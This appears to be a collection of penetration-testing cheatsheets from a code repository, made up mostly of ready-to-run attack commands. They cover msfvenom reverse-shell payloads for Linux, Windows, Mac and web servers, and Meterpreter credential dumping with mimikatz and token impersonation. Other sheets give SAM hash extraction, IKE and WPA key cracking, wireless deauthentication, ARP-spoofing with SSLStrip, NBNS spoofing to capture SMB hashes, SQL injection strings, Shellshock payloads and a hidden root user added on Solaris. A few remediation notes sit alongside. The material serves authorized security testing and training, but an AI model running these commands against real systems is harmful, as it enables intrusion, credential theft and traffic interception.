generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”. 14 | Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2. 15 | Go to Payload tab and select Custom iterator option from Payload type dropdown box. 16 | Burp Suite Custom Iterator 17 | Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box. 18 | Position 1 list and separator option 19 | Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox. 20 | Position 2 21 | After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64. 22 | PayloadProcessin_AddRule_Encode 23 | PayloadProcessingEncode 24 | By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding. 25 | That’s it. You can start the Intruder attack. 26 | 27 | Bruteforce attack 28 | 29 | The method I’m using for the bruteforce attack is targeting only one username per Intruder attack. 30 | Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings. 31 | Burp Intruder Brute forcer 32 | In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column. 33 | Burp Intruder Add Prefix 34 | Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding. 35 | Burp Sutei Bruteforce Attack Settings 36 | Done! You can start the Intruder attack! 37 | 38 | [>] Automated Security Analyser for ASP.NET Websites 39 | 40 | https://asafaweb.com -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_IKEScan.txt: -------------------------------------------------------------------------------- 1 | Aggressive Mode VPN -- IKE-Scan, PSK-Crack 2 | 3 | In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. 4 | 5 | This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure. 6 | 7 | It looks like this: 8 | 9 | $ ike-scan 192.168.207.134 10 | Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 11 | 12 | 192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) 13 | Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). 14 | 0 returned handshake; 1 returned notify 15 | 16 | ---------------------------------------------------------------------------------------------------------------------------------- 17 | 18 | $ sudo ike-scan -A 192.168.207.134 19 | Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) 20 | 21 | 192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) 22 | 23 | ---------------------------------------------------------------------------------------------------------------------------------- 24 | 25 | To save with some output: 26 | 27 | $ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key 28 | 29 | Once you have you psk file to crack you're stuck with two options psk-crack and cain 30 | 31 | ---------------------------------------------------------------------------------------------------------------------------------- 32 | 33 | Brute force: 34 | 35 | $psk-crack -b 5 192-168-207-134key 36 | Running in brute-force cracking mode 37 | Brute force with 36 chars up to length 5 will take up to 60466176 iterations 38 | 39 | no match found for MD5 hash 5c178d[SNIP] 40 | Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec) 41 | 42 | Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= 43 | 44 | $ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key 45 | Running in brute-force cracking modde 46 | Brute force with 63 chars up to length 5 will take up to 992436543 iterations 47 | 48 | ---------------------------------------------------------------------------------------------------------------------------------- 49 | 50 | Dictionary attack: 51 | 52 | $psk-crack -d /path/to/dictionary 192-168-207-134key 53 | Running in dictionary cracking mode 54 | 55 | no match found for MD5 hash 5c178d[SNIP] 56 | Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) 57 | 58 | ---------------------------------------------------------------------------------------------------------------------------------- 59 | 60 | References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_LocalSamDump.txt: -------------------------------------------------------------------------------- 1 | fdisk -l 2 | 3 | mount -t ntfs /dev/sda1 /mnt 4 | 5 | df -k 6 | 7 | cd /mnt 8 | ls 9 | cd WINDOWS/system32/config 10 | 11 | ls 12 | bkhive system /root/hive.txt 13 | samdump2 SAM /root/hive.txt > /root/hash.txt 14 | 15 | john /root/hash.txt -format=nt2 -users=Administrator 16 | cd /root/.john 17 | ls -l 18 | cat john.pot -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_MSFPostExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] Meterpreter Shell 2 | 3 | meterpreter > sysinfo 4 | 5 | meterpreter > getuid 6 | 7 | meterpreter > getsystem 8 | 9 | meterpreter > hashdump 10 | 11 | meterpreter > load/use mimikatz 12 | 13 | kerberos Attempt to retrieve kerberos creds 14 | livessp Attempt to retrieve livessp creds 15 | mimikatz_command Run a custom commannd 16 | msv Attempt to retrieve msv creds (hashes) 17 | ssp Attempt to retrieve ssp creds 18 | tspkg Attempt to retrieve tspkg creds 19 | wdigest Attempt to retrieve wdigest creds 20 | 21 | meterpreter > wdigest 22 | 23 | meterpreter > use incognito 24 | meterpreter > list_tokens -u 25 | meterpreter > impersonate_token SERV-2K3\\Administrator 26 | execute -f cmd.exe -i -t -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Metasploit.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Metasploit.pdf -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_MetasploitPayloads.txt: -------------------------------------------------------------------------------- 1 | [+] Creating Metasploit Payloads 2 | 3 | List payloads 4 | msfvenom -l 5 | 6 | Binaries 7 | 8 | Linux 9 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 10 | 11 | Windows 12 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 13 | 14 | Mac 15 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 16 | 17 | 18 | Web Payloads 19 | 20 | PHP 21 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 22 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 23 | 24 | ASP 25 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 26 | 27 | JSP 28 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 29 | 30 | WAR 31 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 32 | 33 | 34 | Scripting Payloads 35 | 36 | Python 37 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 38 | 39 | Bash 40 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 41 | 42 | Perl 43 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 44 | 45 | 46 | Shellcode 47 | 48 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. 49 | 50 | Linux Based Shellcode 51 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 52 | 53 | Windows Based Shellcode 54 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 55 | 56 | Mac Based Shellcode 57 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 58 | 59 | 60 | Handlers 61 | 62 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. 63 | 64 | use exploit/multi/handler 65 | set PAYLOAD 66 | set LHOST 67 | set LPORT 68 | set ExitOnSession false 69 | exploit -j -z 70 | 71 | Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ 72 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_MobileAppTesting.txt: -------------------------------------------------------------------------------- 1 | http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources 2 | 3 | ------------------------------------------ Mobile Application Test Notes (iPhone) 4 | 5 | 6 | Prepping Device and Application: 7 | 8 | [+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04 9 | [+] Enable SSH on iPhone/iPad 10 | [+] Install iFunbox to install the application (http://www.i-funbox.com) 11 | [+] Connect device to lab wireless network 12 | [+] Add web proxy settings - IP address of attacking machine port 8080 13 | [+] Ensure connection and SSH is working 14 | 15 | 16 | Prepping Burp Suite: 17 | 18 | [+] Open Burp Suite and navigate to Proxy->Options, 19 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 20 | 21 | [+] Download and install burp certificate (.crt) onto ipad. 22 | 23 | Mobile Application Penetration Testing: 24 | 25 | [+] Browse the following Directory for insecure storage 26 | [-] /private/var/mobile/applications/ 27 | 28 | 29 | Notes: 30 | 31 | [+] Application file type - x.ipa 32 | 33 | [+] Easy way: 34 | 35 | - Place attacking machine and apple device on wireless network with app installed. 36 | - Email burps .cer to apple device and install 37 | - Start burp and disable firewall on listening machine. 38 | - Change proxy settings on apple device to point to listening burp machine/port. 39 | 40 | 41 | ------------------------------------------ Mobile Application Test Notes (Android) 42 | 43 | [+] Create a virtual device: 44 | [-] android avd 45 | 46 | [+] Start the emulator: 47 | [-] emulator –avd testavd 48 | 49 | [+] Install the application: 50 | [-] adb install 51 | 52 | [+] Open Burp Suite and navigate to Proxy->Options, 53 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 54 | 55 | [+] Start the emulator and proxy: 56 | [-] emulator –avd testavd –http-proxy http://localhost:8080 57 | 58 | [+] Download and install burp certificate (.crt) onto the emulator using the push shell command. 59 | 60 | 61 | Notes: 62 | 63 | [+] Application file type - x.apk 64 | 65 | Install Certs: http://www.realmb.com/droidCert/ 66 | SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp 67 | 68 | http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Networking.txt: -------------------------------------------------------------------------------- 1 | Useful Networking Cheatsheet 2 | ---------------------------- 3 | 4 | [+] Setting up an Ethernet bridge in Ubuntu/Kali Linux 5 | 6 | # Install bridge-utils 7 | sudo apt-get install bridge-utils 8 | 9 | # Disable network-manager + firewall 10 | 11 | # Configuration 12 | 13 | ifconfig 14 | ifconfig eth0 0.0.0.0 15 | ifconfig eth1 0.0.0.0 16 | brctl addbr br0 17 | brctl addif br0 eth0 18 | brctl addif br0 eth1 19 | ifconfig br0 up 20 | dhclient br0 21 | 22 | sudo tcpdump -i br0 -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Oracle.txt: -------------------------------------------------------------------------------- 1 | Oracle Penetration Testing 2 | -------------------------- 3 | 4 | Tools within Kali: 5 | 6 | oscanner 7 | root@kali:~# oscanner -s 192.168.1.15 -P 1040 8 | 9 | sidguess 10 | root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt 11 | 12 | tnscmd10g 13 | root@kali:~# tnscmd10g version -h 192.168.1.20 14 | 15 | Nmap 16 | nmap -p 1521 -A 192.168.15.205 17 | 18 | Nmap nse scripts 19 | Metasploit auxiliaries -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Pyinstaller.txt: -------------------------------------------------------------------------------- 1 | python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py 2 | 3 | [+] Generate the .spec file. 4 | [+] Windows: (You want a single EXE file with your data in it, hence --onefile). 5 | 6 | python pyinstaller.py --onefile your_main_file.py 7 | 8 | [+] Rebuild your package. 9 | 10 | python pyinstaller.py your_main_file.spec 11 | 12 | [+]Look for your .exe or your .app bundle in the dist directory. -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Python.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Python.pdf -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Remediations.txt: -------------------------------------------------------------------------------- 1 | [+] Weak SSH Ciphers 2 | 3 | sudo nano /etc/ssh/sshd_config 4 | 5 | Add the following lines: 6 | 7 | Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour 8 | MACs hmac-sha1,hmac-ripemd160 9 | 10 | Restart SSH 11 | 12 | 13 | [+] Unquoted Service Paths 14 | 15 | Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services 16 | Find the service in question and simply add " " either side of the ImagePath string. 17 | 18 | Check permissions: 19 | C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe" -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SMBCapture.txt: -------------------------------------------------------------------------------- 1 | [+] NBNS Spoof / Capture 2 | 3 | [>] NBNS Spoof 4 | msf > use auxiliary/spoof/nbns/nbns_response 5 | msf auxiliary(nbns_response) > show options 6 | msf auxiliary(nbns_response) > set INTERFACE eth0 7 | msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10 8 | msf auxiliary(nbns_response) > run 9 | 10 | [>] SMB Capture 11 | 12 | msf > use auxiliary/server/capture/smb 13 | msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb 14 | msf auxiliary(smb) > run 15 | 16 | [>] HTTP NTML Capture 17 | 18 | msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm 19 | msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http 20 | msf auxiliary(smb) > set SRVPORT 80 21 | msf auxiliary(smb) > set URIPATH / 22 | msf auxiliary(smb) > run 23 | 24 | 25 | Fix: 26 | http://www.leonteale.co.uk/netbios-nbns-spoofing/ 27 | 28 | Solution 29 | The solution to this is to disable Netbios from broadcasting. The setting for this is in, what i hope, a very familiar place thaet you might not have really paid attention too before. 30 | netbios 31 | 32 | Netbios, according to Microsoft, is no longer needed as of Windows 2000. 33 | However, there are a few side effects. 34 | One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially “deprecated” NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you won’t be able to establish a forest trust between two Windows Server 2003 forests. 35 | But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations. 36 | See below for step by step instructions on disabling Netbios on workstations: 37 | 38 | Windows XP, Windows Server 2003, and Windows 2000 39 | On the desktop, right-click My Network Places, and then click Properties. 40 | Right-click Local Area Connection, and then click Properties 41 | In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list. 42 | Click Use NetBIOS setting from the DHCP server, and then click OK three times. 43 | 44 | For Windows Vista 45 | On the desktop, right-click Network, and then click Properties. 46 | Under Tasks, click Manage network connections. 47 | Right-click Local Area Connection, and then click Properties 48 | In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab. 49 | Click Use NetBIOS setting from the DHCP server, and then click OK three times. 50 | 51 | For Windows 7 52 | Click Start, and then click Control Panel. 53 | Under Network and Internet, click View network status and tasks. 54 | Click Change adapter settings. 55 | Right-click Local Area Connection, and then click Properties. 56 | In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab. 57 | Click Use NetBIOS setting from the DHCP server, and then click OK three times. -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SMBEnumeration.txt: -------------------------------------------------------------------------------- 1 | SMB Enumeration Techniques using Backtrack: 2 | 3 | 1. NBTSCAN 4 | 5 | root@bt:~# nbtscan -r 10.0.2.0/24 6 | Doing NBT name scan for addresses from 10.0.2.0/24 7 | 8 | IP address NetBIOS Name Server User MAC address 9 | ------------------------------------------------------------------------------ 10 | 10.0.2.0 Sendto failed: Permission denied 11 | 10.0.2.10 12 | 10.0.2.15 METASPLOITABLE METASPLOITABLE 00-00-00-00-00-00 13 | 10.0.2.18 TEST01 TEST01 00-11-21-22-1d-4d 14 | 10.0.2.45 TEST04 TEST04 00-12-d2-34-11-55 15 | 16 | 2. NMAP 17 | 18 | nmap -p 1-65535 -T4 -O -A -v 10.0.2.15 19 | 20 | 3. SMBCLIENT 21 | 22 | root@bt:~# smbclient -L=10.0.2.15 23 | 24 | Null Sessions 25 | 26 | root@bt:~# smbclient \\\\10.0.2.15\\tmp 27 | Enter root's password: 28 | Anonymous login successful 29 | 30 | 31 | SMB Enumeration Techniques using Windows Tools: 32 | 33 | 1. NetBIOS Enumerator (nbtenum) 34 | 35 | http://nbtenum.sourceforge.net/ -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SMTPOpenRelay.txt: -------------------------------------------------------------------------------- 1 | [+] SMTP Open Relay Commands 2 | 3 | [-] ncat -C 86.54.23.178 25 4 | [-] HELO mail.co.uk 5 | [-] MAIL FROM: 6 | [-] RCPT TO: 7 | [-] DATA 8 | Test Email -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SQLInjection.txt: -------------------------------------------------------------------------------- 1 | [+] Union Based SQL Injection 2 | 3 | ' or 1=1# 4 | 5 | 1' ORDER BY 10# 6 | 7 | 1' UNION SELECT version(),2# 8 | 9 | 1' UNION SELECT version(),database()# 10 | 11 | 1' UNION SELECT version(),user()# 12 | 13 | 1' UNION ALL SELECT table_name,2 from information_schema.tables# 14 | 15 | 1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"# 16 | 17 | 1' UNION ALL SELECT concat(user,char(58),password),2 from users# 18 | 19 | 20 | sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SSLStrip.txt: -------------------------------------------------------------------------------- 1 | 1) Flip your machine into forwarding mode (as root): 2 | echo "1" > /proc/sys/net/ipv4/ip_forward 3 | 4 | 2) Setup iptables to intercept HTTP requests (as root): 5 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 6 | 7 | 3) sslstip.py -l 8080 -f lock.ico 8 | 9 | 4) Run arpspoof to redirect traffic to your machine (as root): 10 | arpspoof -i -t -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Solaris.txt: -------------------------------------------------------------------------------- 1 | [+] Solaris vulnerabilities: 2 | 3 | Solaris 7: 4 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 5 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 6 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 7 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 8 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root 9 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 10 | 11 | Solaris 8: 12 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 13 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 14 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 15 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 16 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 17 | no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 18 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 19 | 20 | solaris 9: 21 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 22 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 23 | sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 24 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 25 | 26 | Solaris 10: 27 | fuser TELNET - authentication bypass through -f command - can be manually exploited 28 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 29 | 30 | Solaris 11: 31 | fuser TELNET - authentication bypass through -f command - can be manually exploited 32 | 33 | [+] Adding solaris user: 34 | 35 | useradd -u 0 -o pentestuser 36 | passwd -d pentestuser 37 | 38 | [+] In addition, familiarise yourself with rpcinfo, nfsshell, showmount, 'mount -t nfs'. -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Tools.txt: -------------------------------------------------------------------------------- 1 | Browser Addons 2 | -------------- 3 | 4 | - Chrome: 5 | 6 | Recx Security Analyser 7 | Wappalyzer 8 | 9 | - Firefox/Iceweasel: 10 | 11 | Web Developer 12 | Tamper Data 13 | FoxyProxy Standard 14 | User Agent Switcher 15 | PassiveRecon 16 | Wappalyzer 17 | Firebug 18 | HackBar -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_UsefulCommands.txt: -------------------------------------------------------------------------------- 1 | Useful commands 2 | --------------- 3 | 4 | [+] Remove text using sed 5 | 6 | cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g' 7 | 8 | [+] Port forwarding using NCAT 9 | 10 | ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443" 11 | 12 | [+] Windows 7 or later, build port relay 13 | 14 | C:\> netsh interface portproxy add v4tov4 listenport= listenaddress=0.0.0.0 connectport= connectaddress= 15 | 16 | [+] Grab HTTP Headers 17 | 18 | curl -LIN 19 | 20 | [+] Quickly generate an MD5 hash for a text string using OpenSSL 21 | 22 | echo -n 'text to be encrypted' | openssl md5 23 | 24 | [+] Shutdown a Windows machine from Linux 25 | 26 | net rpc shutdown -I ipAddressOfWindowsPC -U username%password 27 | 28 | [+] Conficker Detection with NMAP 29 | 30 | nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES 31 | 32 | [+] Determine if a port is open with bash 33 | 34 | (: /dev/null && echo "OPEN" || echo "CLOSED" -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Vlans.txt: -------------------------------------------------------------------------------- 1 | Configure an Ethernet interface as a VLAN trunk 2 | --------------------------------------------------- 3 | 4 | Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3. 5 | 6 | [+] First install the vlan package if it is not already present: 7 | 8 | apt-get install vlan 9 | 10 | [+] Turn off network-manager 11 | 12 | sudo stop network-manager 13 | 14 | [+] Configuring interfaces 15 | 16 | vconfig add eth0 (you may get a warning message on the first one) 17 | example: vconfig add eth0 101 18 | 19 | ifconfig eth0. /24 up 20 | example: ifconfig eth0.101 192.168.1.10/24 up 21 | 22 | ifconfig eth0. 23 | 24 | Note: If any issues run, ifconfig eth0 0.0.0.0 up 25 | Note: Specify interface with nmap scanning (nmap -e eth0.101) 26 | Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. (route add) 27 | 28 | [+] Remove Configuration 29 | vconfig rem eth0.101 30 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_VulnVerify.txt: -------------------------------------------------------------------------------- 1 | Verify Various Vulnerabilities 2 | ------------------------------ 3 | 4 | [+] IPMI Cipher Suite Zero Authentication Bypass: 5 | http://www.tenable.com/plugins/index.php?view=single&id=68931 6 | 7 | Tools required: 8 | ipmitool 9 | freeipmi-tools 10 | 11 | ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list 12 | 13 | # Specifying Cipher Suite Zero 14 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list 15 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status 16 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help 17 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell 18 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor 19 | 20 | 21 | [+] Bash Remote Code Execution (Shellshock) 22 | http://www.tenable.com/plugins/index.php?view=single&id=77823 23 | 24 | x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt 25 | x: () { :;}; echo "Hacked" > /var/www/hacked.html 26 | 27 | 28 | [+] DNS Server Cache Snooping Remote Information Disclosure 29 | http://www.tenable.com/plugins/index.php?view=single&id=12217 30 | 31 | Nmap Script: dns-cache-snoop 32 | http://nmap.org/nsedoc/scripts/dns-cache-snoop.html 33 | 34 | nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' 35 | 36 | 37 | [+] IP Forwarding Enabled 38 | http://www.tenable.com/plugins/index.php?view=single&id=50686 39 | 40 | Nmap Script: ip-forwarding 41 | http://nmap.org/nsedoc/scripts/ip-forwarding.html 42 | 43 | sudo nmap -sn --script ip-forwarding --script-args='target=www.example.com' 44 | 45 | Alternatives: 46 | - Set VM's default gateway as the victim IP address and attempt to route elsewhere. 47 | - http://pentestmonkey.net/tools/gateway-finder 48 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_WindowsCommandLine.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Penentration Testing_Scripts/Cheatsheets/Cheatsheet_WindowsCommandLine.pdf -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_WirelessTesting.txt: -------------------------------------------------------------------------------- 1 | WEP attack with aircrack-ng suite. 2 | ---------------------------------- 3 | 4 | airmon-ng start wlan0 5 | airodump-ng -c --bssid -w wlan0mon 6 | aireplay-ng -1 0 -e -a -h wlan0mon 7 | aireplay-ng -3 -b -h wlan0mon # ARP Replay 8 | aireplay-ng -0 1 -a -c wlan0mon 9 | aircrack-ng -0 10 | 11 | airmon-ng start wlan0 12 | airodump-ng -c --bssid -w wlan0mon 13 | aireplay-ng -1 0 -e -a -h wlan0mon 14 | aireplay-ng -5 -b -h wlan0mon 15 | packetforge-ng -0 -a -h -l -k -y -w 16 | tcpdump -n -vvv -e -s0 -r 17 | aireplay-ng -2 -r wlan0mon 18 | aircrack-ng -0 19 | 20 | 21 | WPA PSK attack with aircrack-ng suite. 22 | -------------------------------------- 23 | 24 | airmon-ng start wlan0 25 | airodump-ng -c --bssid -w wlan0mon 26 | aireplay-ng -0 1 -a -c wlan0mon 27 | aircrack-ng -0 -w 28 | 29 | You can capture the handshake passively (it takes time) or de-authenticate a client. 30 | 31 | De-authentication attack 32 | aireplay-ng --deauth 3 -a -c mon0 33 | 34 | Deauth every client - aireplay-ng -0 5 -a mon0 35 | 36 | Dictionary Attack 37 | aircrack-ng -w passwords.lst capture-01.cap 38 | 39 | Brute force Attack 40 | crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap 41 | 42 | CoWPAtty Attack 43 | Wordlist mode: 44 | cowpatty -r -f -2 -s 45 | 46 | PMK mode: 47 | genpmk -f -d -s 48 | cowpatty -r -d -2 -s 49 | 50 | Rogue Access Point Testing 51 | -------------------------- 52 | 53 | # ifconfig wlan0 down 54 | # iw reg set BO 55 | # iwconfig wlan0 txpower 0 56 | # ifconfig wlan0 up 57 | # airmon-ng start wlan0 58 | # airodump-ng --write capture mon0 59 | 60 | ifconfig wlan1 down 61 | iw reg set BO 62 | ifconfig wlan1 up 63 | iwconfig wlan1 channel 13 64 